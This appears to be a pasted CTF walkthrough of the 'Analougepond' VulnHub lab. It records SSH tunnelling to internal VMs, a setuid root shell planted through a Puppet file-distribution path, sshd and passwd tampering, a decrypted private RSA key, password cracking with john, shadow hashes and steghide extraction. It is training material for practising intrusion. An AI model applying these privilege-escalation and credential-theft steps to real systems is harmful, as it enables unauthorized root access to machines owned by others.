- tcp 0 0 192.168.1.249:22 192.168.1.66:52544 ESTABLISHED 5475/sshd: eric [pr
- tcp 0 0 192.168.122.1:50416 192.168.122.2:22 ESTABLISHED 6977/ssh
- tcp 0 0 192.168.1.249:22 192.168.1.66:52920 ESTABLISHED 6541/sshd: eric [pr
- tcp 0 0 192.168.122.1:40201 192.168.122.2:22 ESTABLISHED 6532/ssh
- tcp6 0 0 :::22 :::* LISTEN 915/sshd
- tcp6 0 0 ::1:7171 :::* LISTEN 6977/ssh
- udp 0 0 0.0.0.0:42984 0.0.0.0:* 976/snmpd
- udp 0 0 192.168.122.1:53 0.0.0.0:* 1192/dnsmasq
- udp 0 0 0.0.0.0:67 0.0.0.0:* 1192/dnsmasq
- udp 0 0 0.0.0.0:68 0.0.0.0:* 662/dhclient
- udp 12480 0 0.0.0.0:41040 0.0.0.0:* 662/dhclient
- udp 0 0 0.0.0.0:161 0.0.0.0:* 976/snmpd
- udp6 0 0 ::1:161 :::* 976/snmpd
- udp6 0 0 :::39304 :::* 662/dhclient
- root@analoguepond:~#
- now we should be able to reach the new host(I hope).
- we open firefox and setup a socks proxy with our ssh port for 7070 and host 127.0.0.1
- Then we open https://192.168.122.2:8140/ and we cna reach the website on the inner server.
- The environment must be purely alphanumeric, not ''
- https://192.168.122.2:8140/0x27
- The indirection name must be purely alphanumeric, not ''
- Will come back to this, after I think a bit more on ideas.
- As of now, we should start enumerating what is here, as we also have sandieshaws login over ssh. Lets look for the web files.
- sandieshaw@puppet:/tmp$ cat /etc/passwd
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
- bin:x:2:2:bin:/bin:/usr/sbin/nologin
- sys:x:3:3:sys:/dev:/usr/sbin/nologin
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/usr/sbin/nologin
- man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
- lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
- mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
- news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
- uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
- proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
- www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
- backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
- list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
- irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
- nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
- libuuid:x:100:101::/var/lib/libuuid:
- syslog:x:101:104::/home/syslog:/bin/false
- messagebus:x:102:106::/var/run/dbus:/bin/false
- landscape:x:103:109::/var/lib/landscape:/bin/false
- sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
- sandieshaw:x:1000:1000:Sandra Ann Goodrich,,,:/home/sandieshaw:/bin/bash
- puppet:x:105:112:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
- sandieshaw@puppet:/tmp$
- #lets update our hosts file again.
- 192.168.1.249 analoguepond
- 192.168.122.2 puppet.example.com
- 192.168.122.3 barringsbank.example.com
- quick reminders:
- VNC Port forwarding through tunnel:
- ssh -L 5901:127.0.0.1:5901 -N -f -l eric 192.168.1.249
- ssh -L 5900:127.0.0.1:5900 -N -f -l eric 192.168.1.249
- Dynamic ssh tunnel for proxy chains
- ssh -f -N -D 7070 eric@192.168.1.249
- while SSH'ed into 192.168.1.249
- ssh sandieshaw@192.168.122.2
- puppetonastring
- from within 192.168.1.249
- apt-get install nmap
- nmap -sC -sV -T5 -v -p- --script vuln 192.168.122.3
- Nmap scan report for barringsbank.example.com (192.168.122.3)
- Host is up (0.0048s latency).
- Not shown: 65534 closed ports
- PORT STATE SERVICE VERSION
- 22/tcp open tcpwrapped
- on sandieshaw in /tmp is program called spin. when run, it makes a spinning symbol on the screen. After copying it out to our machine and running strings, we can see lots of functions but no clue what they do. So we start browsing the system, and we find another spin file. It's in /etc/puppet/wiffle/files/spin with a spin.c
- We place a bash script named spin in this directory, then wait and find later that our shell script has moved to/tmp as /tmp/spin with system privs. However, even though it's owne by root as a system file, it doesn't seem to give is a shell, as it's running in the same user context as us, which is limited user shell.
- We try another method using a c program as follows.
- #gcc root.c -o spin
- int main(void){
- setresuid(0, 0, 0);
- system("/bin/bash");
- }
- We compile locally, move to eric and then down to sandieshaw. We place it back in the /etc/puppet/wiggle/files/ directory as spin, and then wait till it
- moves it back to /tmp again. This time around, it exeutes our suid call, and spawns us a shell as root!
- :)
- sandieshaw@puppet:/tmp$ ls -la
- total 24
- drwxrwxrwt 2 root root 4096 Apr 26 08:30 .
- drwxr-xr-x 22 root root 4096 Jan 7 11:45 ..
- -rwsr-xr-x 1 root root 8688 Apr 26 08:30 spin
- -rwxrwxr-x 1 sandieshaw sandieshaw 22 Apr 26 07:32 uname
- sandieshaw@puppet:/tmp$ spin
- root@puppet:/tmp# id
- uid=0(root) gid=1000(sandieshaw) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(sandieshaw)
- root@puppet:/tmp#
- We go to the root folder and have a look around
- ./protovision:
- total 24K
- 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 .
- 4.0K drwx------ 4 root root 4.0K Jan 7 17:49 ..
- 4.0K -rw-r--r-- 1 root root 401 Dec 21 22:15 flag1.txt.0xff
- 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 .I_have_you_now
- 4.0K -rw-r--r-- 1 root root 39 Dec 17 12:51 jim
- 4.0K -rw-r--r-- 1 root root 53 Dec 17 12:51 melvin
- ./protovision/.I_have_you_now:
- total 84K
- 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 .
- 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 ..
- 4.0K drwxr-xr-x 3 root root 4.0K Dec 18 15:29 .a
- 72K -r-------- 1 root root 71K Dec 18 15:23 grauniad_1995-02-27.jpeg
- ./protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z:
- total 16K
- 4.0K drwxr-xr-x 2 root root 4.0K Dec 21 23:20 .
- 4.0K drwxr-xr-x 3 root root 4.0K Dec 18 18:42 ..
- 4.0K ---x------ 1 root root 7 Dec 18 15:34 my_world_you_are_persistent_try
- 4.0K -rw-r--r-- 1 root root 1.4K Dec 21 22:10 nleeson_key.gpg
- less /root/protovision/flag1.txt.0xff
- root@puppet:/root# cat /root/protovision/jim /root/protovision/melvin /root/protovision/flag1.txt.0xff
- Mr Potato Head! Backdoors are not a...
- Boy you guys are dumb! I got this all figured out...
- 3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861
- root@puppet:/root#
- cat flag1.txt.0xff
- 3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861
- root@kali:/mnt/HDD2/ctf/analouge-pond# cat flag1.txt.0xff | xxd -r -p | rev | base64 -d
- https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something...
- root@kali:/mnt/HDD2/ctf/analouge-pond#
- ssh root@192.168.122.3
- ssh_exchange_identification: read: Connection reset by peer
- we edit /etc/hosts.deny which seems to be blocking outbound ssh connections?
- known_hosts on puppet /root/.ssh - |1|qEUhT3+BE6VMnDOqXiC0QTUVaE0=|AntYS4Su9EBESzdihQO62CZgc0A= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLcUc6YYOlbXM7YzsXo/GDT3C2mwx6H8lsBPbKVr+6HBAfdJXpCXSiDh0II3Ie0j2y4e2fjV+x1yHeGVUi3Lff8=
- Eventually we find that the .3 server has some contorl through the use of the puppet scripts in /etc/puppet/modules/vulnhub/files
- We edit the sshd login deets to allow root login, with no password, and as an allowed user, and also disable pam requirment. We need to wait till spin kicks in and uploades the files(hopefully).
- We also edit the hosts.deny files and allow sshd to do its thing. We know sandieshaw was allowed to login via the scripts. lets try her first.
- we copy sandieshaw's entry line from puppet-passwd over to barringsbank-passwd as well, ensuring we have a name on the system(in theory)with the password password:
- openssl passwd -1 -salt xyz password
- $1$xyz$cEUv8aN9ehjhMXG/kSFnM1
- sandieshaw:$1$xyz$cEUv8aN9ehjhMXG/kSFnM1:1000:1000:Sandra Ann Goodrich,,,:/home/sandieshaw:/bin/bash
- ssh sandieshaw@192.168.122.3
- ssh sandieshaw@192.168.122.3
- sandieshaw@192.168.122.3's password:
- Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)
- * Documentation: https://help.ubuntu.com/
- System information as of Wed Apr 26 06:47:18 BST 2017
- System load: 5.81 Memory usage: 4% Processes: 106
- Usage of /: 72.3% of 1.59GB Swap usage: 0% Users logged in: 0
- Graph this data and manage this system at:
- https://landscape.canonical.com/
- 173 packages can be updated.
- 103 updates are security updates.
- New release '16.04.2 LTS' available.
- Run 'do-release-upgrade' to upgrade to it.
- The programs included with the Ubuntu system are free software;
- the exact distribution terms for each program are described in the
- individual files in /usr/share/doc/*/copyright.
- Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
- applicable law.
- The programs included with the Ubuntu system are free software;
- the exact distribution terms for each program are described in the
- individual files in /usr/share/doc/*/copyright.
- Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
- applicable law.
- Could not chdir to home directory /home/sandieshaw: No such file or directory
- nleeson@barringsbank:/$
- thats a nice feeling :)
- we probably should have put an entry in there for nleeson user as password, but lets just play with the system for now..
- nleeson@barringsbank:/home/nleeson$ netstat -antplu
- (No info could be read for "-p": geteuid()=1000 but you should be root.)
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
- tcp 0 0 192.168.122.3:22 192.168.122.2:35430 ESTABLISHED -
- tcp6 0 0 :::22 :::* LISTEN -
- udp 0 0 0.0.0.0:68 0.0.0.0:* -
- udp 0 0 0.0.0.0:31345 0.0.0.0:* -
- udp6 0 0 :::14309 :::* -
- nleeson@barringsbank:/home/nleeson$
- no webserver running.
- nleeson@barringsbank:/home/nleeson$ cat /etc/issue /etc/*ele*;uname -a
- Ubuntu 14.04.3 LTS \n \l
- DISTRIB_ID=Ubuntu
- DISTRIB_RELEASE=14.04
- DISTRIB_CODENAME=trusty
- DISTRIB_DESCRIPTION="Ubuntu 14.04.3 LTS"
- NAME="Ubuntu"
- VERSION="14.04.3 LTS, Trusty Tahr"
- ID=ubuntu
- ID_LIKE=debian
- PRETTY_NAME="Ubuntu 14.04.3 LTS"
- VERSION_ID="14.04"
- HOME_URL="http://www.ubuntu.com/"
- SUPPORT_URL="http://help.ubuntu.com/"
- BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
- Linux barringsbank 4.4.0-57-generic #78~14.04.1-Ubuntu SMP Sat Dec 10 00:14:47 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
- We're going to put our suid root.c program, onto the new host, bia puppet init.pp
- ##w00t for r00t
- file { "/tmp/roots":
- ensure => "directory",
- recurse => true,
- purge => true,
- force => true,
- owner => root,
- group => root,
- mode => 4755,
- source => "puppet:///modules/vulnhub/roots",
- }
- apt-get install nano
- We add to init.pp on sandieshaw server. We then wait and see if it shows up in /tmp on nleeson server.
- and, we are grooooooot..er, I am root.
- /etc/shadow
- nleeson:$6$sspRmsSA$fD6XXOHUcf1UniBIAuGcFnJ4Qz49IlIdweutehpNDdTk9u9mAeAej9ToMUDrh3af/nsYQ787eXbKFTZpRtRSN/:17150:0:99999:7:::
- web server process on eric? /usr/lib/ruby/vendor_ruby/puppet/application/master.rb
- root@puppet:/usr/lib/ruby/vendor_ruby/puppet/network/http/rack# cat /etc/puppet/puppet.conf
- [main]
- logdir=/var/log/puppet
- vardir=/var/lib/puppet
- ssldir=/var/lib/puppet/ssl
- rundir=/var/run/puppet
- factpath=$vardir/lib/facter
- templatedir=$confdir/templates
- prerun_command=/etc/puppet/etckeeper-commit-pre
- postrun_command=/etc/puppet/etckeeper-commit-post
- certname=puppet.example.com
- [master]
- # These are needed when the puppetmaster is run by passenger
- # and can safely be removed if webrick is used.
- ssl_client_header = SSL_CLIENT_S_DN
- ssl_client_verify_header = SSL_CLIENT_VERIFY
- dns_alt_names = puppet, puppet.example.com
- [agent]
- server = puppet.example.com
- root@puppet:/etc/puppet# cat fileserver.conf
- # This file consists of arbitrarily named sections/modules
- # defining where files are served from and to whom
- # Define a section 'files'
- # Adapt the allow/deny settings to your needs. Order
- # for allow/deny does not matter, allow always takes precedence
- # over deny
- [files]
- path /etc/puppet/files
- # allow *.example.com
- # deny *.evil.example.com
- # allow 192.168.0.0/24
- [plugins]
- # allow *.example.com
- # deny *.evil.example.com
- # allow 192.168.0.0/24
- root@puppet:/etc/puppet#
- nleeson_key.gpg
- root@puppet:~/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z#
- gpg -d nleeson_key.gpg
- gpg: CAST5 encrypted data
- gpg: gpg-agent is not available in this session
- gpg: encrypted with 1 passphrase
- -----BEGIN RSA PRIVATE KEY-----
- Proc-Type: 4,ENCRYPTED
- DEK-Info: AES-128-CBC,1864E0393453C88F778D5E02717B8B16
- RTSpHZnf1Onpy3OHfSat0Bzbrx8wd6EBKlbdZiGjEB0AC4O0ylrSBoWsEJ/loSL8
- jdTbcSG0/GWJU7CS5AQdK7KctWwqnOHe9y4V15gtZcfgxNLrVfMUVAurZ3n2wQqK
- ARmqBXhftPft8EBBAwWwQmBrD+ufF2uaJoKr4Bfu0zMFQxRnNDooBes5wyNO/7k6
- osvGqTEX/xwJG1GB5X0jsDCmBH4WXhafa0nzZXvd2Pd3UpaWPEgyq3vxIQaredR8
- VbJbPSeKypTIj3UyEj+kjczhCiWw9t0Mv0aV4FtMOesnDQYJskL8kSLGRkN+7lHD
- IcHz7az9oqYGBSq77lPkmk7oIpT/pg80pfCyHExROwlTRPzVRHv7KGiKd35R0Hl9
- 7CUQPCjH5ltQW4B6XUmxmoT8N14w5HOxb/JlV7s2g6dXYT0azOeqDsGivpgMY3vy
- rtVakLIsZeYaZYSr6WvTFclXWYctYPMgzRewiRPjyn6DXiD6MtCJZj2CqJ47tP37
- eRRgRRH6a1Sm/BkfSPIXlV0tTpOXfjtHG7VoIc5X343GL/WHM/nhNFvMLdRnVXRM
- YOEKAsYklBLqZ99btTESwJZt9HG/cGpQrbgFwxKPoJy7f5wNLOa1ZhpDyw1IqokO
- Pq4r8zZj4ASyg3gl7ByG11C272mkMG8yiIwOckVgNec/se18PUGBw1HHgRuyzDym
- /6/cwkDzoJlResjsNDQCQcNzSOoZxi3GFIIiB+HjG84MF+ofnn3ayaUZLUaBbPMJ
- jQ7dP6wqIMYwY5ZM6nRQ+RnL6QVBHnXH9RjmbzdVMzmQDjPS0lOg5xkU8B78vG6e
- lphvmlLSM+PFVOqPwhVB8yon97aU23npKIOPu44VsUXU0auKI94qoX0I1EDDQFrE
- UqpWUpCCHrRRTZCdnnE6RnJZ+rjGPvFA95lhUp1fpF8l4U3a8qKlsdtWmzYxHdyg
- +w0QE8VdDsNqgCP7W6KzvN5E5HJ0bbQasadAX5eDd6I94V0fCZrPlzM+5CAXH4E4
- qhmWQPCw7Q1CnW61yG8e9uD1W7yptK5NyZpHHkUbZGIS+P7EZtS99zDPh3V4N7I2
- Mryzxkmi2JyQzf4T1cfK7JTdIC2ULGmFZM26BX3UCV0K+9OOGgRDPU4noS0gNHxP
- VaWVmjGgubE4GDlW0tgw1ET+LaUdAv/LE+3gghpRLn1imdaW9elnIeaVeOWcyrBC
- Ypl8AjYXNRd0uLWBC8xbakmK1tZUPXwefqjQpKjuIuYmmVes3M4DFxGQajmK03nO
- oGaByHu0RVjy0x/zBuOuOp6eKpeaiLWfLM5DSIWlksL/2dmAloSs3LrIPu4dTnRb
- v2YQ+72nLI62alLEaKwXUBoHSSRNTv0hbOyvV8YUp4EmJ8yShAmEE/n9Et62BwYB
- rsi0RhEfih+43PzlwB91I4Elr2k3eBwQ9XiF3KdVgj6wvwqNLZ7aC5YpLcYaVyNT
- fKzUxX02Ejvo60xWJ8u6GIhUK404s2WVeG/PCLwtrKGjpyPCn3yCWpCWpGPuVNrx
- Wg0Um581e4Vw5CLDL5hRLmo7wiqssuL3/Uugf/lc2vF+MxJyoI1F9Zkt2xvRYrLB
- -----END RSA PRIVATE KEY-----
- gpg: WARNING: message was not integrity protected
- verified that password is joshua
- john hashes
- Using default input encoding: UTF-8
- Loaded 1 password hash (SSH [RSA/DSA 32/64])
- Press 'q' or Ctrl-C to abort, almost any other key for status
- joshua (nleeson_key.key)
- 1g 0:00:00:00 DONE 2/3 (2017-04-26 11:40) 10.00g/s 123620p/s 123620c/s 123620C/s joshua
- Use the "--show" option to display all of the cracked passwords reliably
- Session completed
- root@analoguepond:/home# ssh -i rsa.key nleeson@192.168.122.3
- Enter passphrase for key 'rsa.key':
- Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)
- * Documentation: https://help.ubuntu.com/
- System information as of Wed Apr 26 14:57:54 BST 2017
- System load: 0.0 Processes: 109
- Usage of /: 72.4% of 1.59GB Users logged in: 0
- Memory usage: 8% IP address for eth0: 192.168.122.3
- Swap usage: 0%
- Graph this data and manage this system at:
- https://landscape.canonical.com/
- 173 packages can be updated.
- 103 updates are security updates.
- New release '16.04.2 LTS' available.
- Run 'do-release-upgrade' to upgrade to it.
- The programs included with the Ubuntu system are free software;
- the exact distribution terms for each program are described in the
- individual files in /usr/share/doc/*/copyright.
- Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
- applicable law.
- nleeson@barringsbank:~$
- so far I have:
- - Troll Flag - flag.txt
- - Flag1.txt.0xff which gave us the hint for the password "secret" to decode gpg file
- > - Flag 1: You have it when you book Jennifer tickets to Paris on Pan Am. < reference for secret/wargames
- - ssh-rsa password joshua (which was also given as a hint in same server from where we got flag1)
- - root on eric,sandie and nleeson
- Todo:
- - vnc passwords on eric 5900 and 5901
- - decrypt nleeson's /etc/shadow password
- - Flag 2: It will include a final challenge to confirm you hit the jackpot.
- virsh # list
- Id Name State
- ----------------------------------------------------
- 2 puppet running
- 3 barringsbank running
- virsh # dominfo puppet
- Id: 2
- Name: puppet
- UUID: 3561f84c-71c3-f16f-4a7b-9097e7d2ac39
- OS Type: hvm
- State: running
- CPU(s): 1
- CPU time: 5244.9s
- Max memory: 1048576 KiB
- Used memory: 1048576 KiB
- Persistent: yes
- Autostart: enable
- Managed save: no
- Security model: apparmor
- Security DOI: 0
- Security label: libvirt-3561f84c-71c3-f16f-4a7b-9097e7d2ac39 (enforcing)
- virsh # dominfo barringsbank
- Id: 3
- Name: barringsbank
- UUID: 6cf27edd-7559-d6eb-1502-d3135c807785
- OS Type: hvm
- State: running
- CPU(s): 1
- CPU time: 3738.7s
- Max memory: 1048576 KiB
- Used memory: 1048576 KiB
- Persistent: yes
- Autostart: enable
- Managed save: no
- Security model: apparmor
- Security DOI: 0
- Security label: libvirt-6cf27edd-7559-d6eb-1502-d3135c807785 (enforcing)
- virsh #
- dumpxml puppet
- <domain type='qemu' id='2'>
- <name>puppet</name>
- <uuid>3561f84c-71c3-f16f-4a7b-9097e7d2ac39</uuid>
- <description>puppetmaster if you mess with this VM I will sendyoubacktowalker</description>
- vncviewer 127.0.0.1:5900
- password sendyoubacktowalker
- virsh # dumpxml barringsbank
- <domain type='qemu' id='3'>
- <name>barringsbank</name>
- <uuid>6cf27edd-7559-d6eb-1502-d3135c807785</uuid>
- <description>Who do you think you are...? David Lightman from memphistennessee...?</description>
- vncviewer 127.0.0.1:5901
- password memphistennessee...
- (but David Lightman was from Seattle, Washington??)
- With that, we've completed the challenges!
- so far I have:
- - Troll Flag - flag.txt
- - Flag1.txt.0xff which gave us the hint for the password "secret" to decode gpg file
- > - Flag 1: You have it when you book Jennifer tickets to Paris on Pan Am. < reference for secret/wargames
- - ssh-rsa password joshua (which was also given as a hint in same server from where we got flag1)
- - root on eric,sandie and nleeson via exploits/password discover
- - vncviewer 127.0.0.1:5901 / password memphistennessee...
- - vncviewer 127.0.0.1:5900 / password sendyoubacktowalker
- - have access to bank server on vnc, but don't know root password or user(s) passwords from the login prompt,
- although we have the ssh-rsa key, we can ssh into it as nleeson with password joshua using the decoded rsa key
- AS of now, I don't know of what else there could be to do other than crack the /etc/shadow for nleeson, which isn't needed to gain root on the bank server.
- Def feel like I missed something, but I had a lot of fun working my way through this CTF.
- Spoke with op on twitter, gave me a hint for this one. Inspecting the images, we find a hidden message in me.jpg
- root@kali:~/HDD2/ctf/analouge-pond# steghide --info me.jpg
- "me.jpg":
- format: jpeg
- capacity: 11.9 KB
- Try to get information about embedded data ? (y/n) y
- Enter passphrase:
- steghide: could not extract any data with that passphrase!
- root@kali:~/HDD2/ctf/analouge-pond# steghide --info me.jpg
- "me.jpg":
- format: jpeg
- capacity: 11.9 KB
- Try to get information about embedded data ? (y/n) y
- Enter passphrase:
- embedded file "primate_egyptian_flag.txt":
- size: 3.7 KB
- encrypted: rijndael-128, cbc
- compressed: yes
- root@kali:~/HDD2/ctf/analouge-pond#
- steghide --extract -sf me.jpg
- Enter passphrase: reticulatingsplines
- wrote extracted data to "primate_egyptian_flag.txt".
- root@kali:~/HDD2/ctf/analouge-pond#
- cat primate_egyptian_flag.txt | xxd -r -p | rev | base64 -d
- Here's a fender bass for you...
- ,-. _.---._
- | `\.__.-'' `.
- \ _ _ ,. \
- ,+++=._________________)_||______|_|_|| |
- (_.ooo.===================||======|=|=|| |
- ~~' | ~' `~' o o /
- \ /~`\ o o /
- `~' `-.____.-'
- Congratulations to you once again and for the sixth time on capturing this
- flag!
- I've tried to mix things up a bit here, to move away from throw metasploit
- and web exploits at things. I hope you have enjoyed that portion and your
- feedback on this aspect would be appreciated.
- Of note, these VMs are set to do automatic security updates using puppet,
- so this ought to keep things dynamic enough for people.
- Many thanks to mrB3n, Rand0mByteZ and kevinnz for testing this CTF.
- A special thank you to g0tmi1k for hosting all these challenges and the
- valuable advice. A tip of the hat to mrb3n for his recent assistance. Hit
- me on IRC or twitter if you are looking for a hint or have completed the
- challenge.
- Go on, Complete the circle: 06:30 to 07:45 of episode #1 of Our Friends In
- The North (C) BBC 1995.. What's the connection....?
- --Knightmare
- Awesome!
- https://www.youtube.com/watch?v=ChwPpktNqe0
- New Orleans, Baton Rouge and The Rising Sun
- Also the commonality of "war"?
- :)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement